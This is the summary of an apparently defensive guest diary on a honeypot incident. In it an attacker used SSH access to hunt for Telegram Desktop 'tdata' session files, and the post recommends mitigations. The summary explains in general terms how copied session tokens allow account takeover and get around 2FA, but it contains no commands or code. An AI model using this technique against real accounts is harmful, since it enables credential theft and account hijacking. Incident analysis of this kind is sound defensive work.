[Guest Diary] Beyond Cryptojacking: Telegram tdata as a Credential Harvesting Vector, Lessons from a Honeypot Incident, (Wed, Apr 22nd)

This report describes a honeypot compromise in which an attacker gained SSH access, performed system reconnaissance and miner-detection, and sought Telegram Desktop 'tdata' session files to steal persistent authentication tokens (enabling account takeover and bypassing 2FA). The analysis maps observed commands to an attack chain, explains how copied tdata grants immediate access on another machine, and recommends mitigations including SSH hardening, file integrity monitoring, session audits, and network detection of Telegram-related exfiltration.